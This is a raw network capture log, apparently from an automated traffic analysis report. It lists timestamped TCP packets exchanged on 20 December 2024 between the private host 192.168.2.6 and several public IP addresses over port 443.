                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.082022905 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.093514919 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.093570948 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.093576908 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.103178024 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.103234053 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.103239059 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.116067886 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.116151094 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.116157055 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.129264116 CET49886443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.129405022 CET44349886162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.129478931 CET49886443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.129499912 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.129601002 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.129606962 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.137321949 CET44349888162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.137546062 CET49888443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.137557983 CET44349888162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.138986111 CET44349888162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.139106035 CET49888443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.140074015 CET49888443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.140157938 CET44349888162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.140336990 CET49888443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.140346050 CET44349888162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.142883062 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.142945051 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.142951012 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.144294977 CET49887443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.144303083 CET44349887172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.201647043 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.201730013 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.201736927 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.208364010 CET49888443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.208581924 CET44349888162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.208637953 CET49888443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.210045099 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.210110903 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.210117102 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.255268097 CET49887443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.255270004 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.269901991 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.274655104 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.274780989 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.274787903 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.290636063 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.290685892 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.290692091 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.297808886 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.297936916 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.297950983 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.302069902 CET49887443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.302262068 CET44349887172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.302328110 CET49887443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.302700996 CET49897443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.302753925 CET44349897172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.302804947 CET49897443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.304115057 CET49897443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.304140091 CET44349897172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.311249018 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.311304092 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.311320066 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.324815989 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.324899912 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.324906111 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.338346958 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.338398933 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.338406086 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.351846933 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.351970911 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.351977110 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.365617990 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.365665913 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.365672112 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.378336906 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.378401995 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.378411055 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.390000105 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.390309095 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.390316010 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.401844025 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.401892900 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.401899099 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.413321018 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.413389921 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.413397074 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.425033092 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.425113916 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.425120115 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.449965954 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.450016022 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.450026989 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.454123974 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.454169035 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.454174995 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.454180956 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.454229116 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.462496042 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.470256090 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.470372915 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.470380068 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.478064060 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.478110075 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.478121996 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.478128910 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.478209972 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.485599995 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.493045092 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.493096113 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.493100882 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.500646114 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.500749111 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.500802994 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.500809908 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.501019001 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.508089066 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.515683889 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.515749931 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.515757084 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.523169994 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.523214102 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.523242950 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.523250103 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.523304939 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.532849073 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.538252115 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.538343906 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.538484097 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.538491964 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.538784981 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.545773029 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.553493023 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.553549051 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.553555965 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.560908079 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.560973883 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.560980082 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.560993910 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.561038971 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.568201065 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.575926065 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.575970888 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.575997114 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.576004982 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.576232910 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.583326101 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.593733072 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.593780994 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.593854904 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.593863964 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.594098091 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.608773947 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.610388994 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.610455036 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.610460997 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.622287035 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.622332096 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.622359037 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.622364998 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.622414112 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.637667894 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.649149895 CET44349778173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.649225950 CET49778443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.653640985 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.653692961 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.653701067 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.654959917 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.655020952 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.655066967 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.655071020 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.655085087 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.655118942 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.659171104 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.659224033 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.659389973 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.659395933 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.659440041 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.661212921 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.663214922 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.663542032 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.663547993 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.665371895 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.666663885 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.666671038 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.667426109 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.667571068 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.667577982 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.669365883 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.669522047 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.669531107 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.673273087 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.673404932 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.673410892 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.673964977 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.674158096 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.674164057 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.674371958 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.674423933 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.674494028 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.776403904 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.776485920 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.776489019 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.776537895 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.778162003 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.778179884 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.953651905 CET44349889116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.953783035 CET49889443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.954365969 CET49889443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.954380989 CET44349889116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.957007885 CET49889443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.957019091 CET44349889116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.957082987 CET49889443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.957093954 CET44349889116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.957099915 CET49889443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.957104921 CET44349889116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.957182884 CET49889443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.957205057 CET44349889116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.957212925 CET49889443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.957217932 CET44349889116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.957304001 CET49889443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.957360029 CET44349889116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.243746996 CET49908443192.168.2.623.44.201.16
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.243787050 CET4434990823.44.201.16192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.243863106 CET49908443192.168.2.623.44.201.16
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.244904041 CET49908443192.168.2.623.44.201.16
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.244916916 CET4434990823.44.201.16192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.245554924 CET49909443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.245585918 CET4434990920.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.245835066 CET49909443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.246531963 CET49909443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.246548891 CET4434990920.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.316903114 CET44349892172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.317183971 CET49892443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.317250967 CET44349892172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.317598104 CET44349892172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.318077087 CET49892443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.318188906 CET44349892172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.319516897 CET44349893172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.319720984 CET49893443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.319736004 CET44349893172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.320022106 CET44349893172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.320518017 CET49893443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.320583105 CET44349893172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.321986914 CET44349896172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.322312117 CET49896443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.322326899 CET44349896172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.325759888 CET44349894172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.325858116 CET44349896172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.325925112 CET49896443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.325953960 CET49894443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.325957060 CET44349895172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.325974941 CET44349894172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.326277018 CET49896443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.326447964 CET44349896172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.326632023 CET49895443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.326648951 CET44349895172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.327023983 CET44349894172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.327104092 CET49894443192.168.2.6172.64.41.3
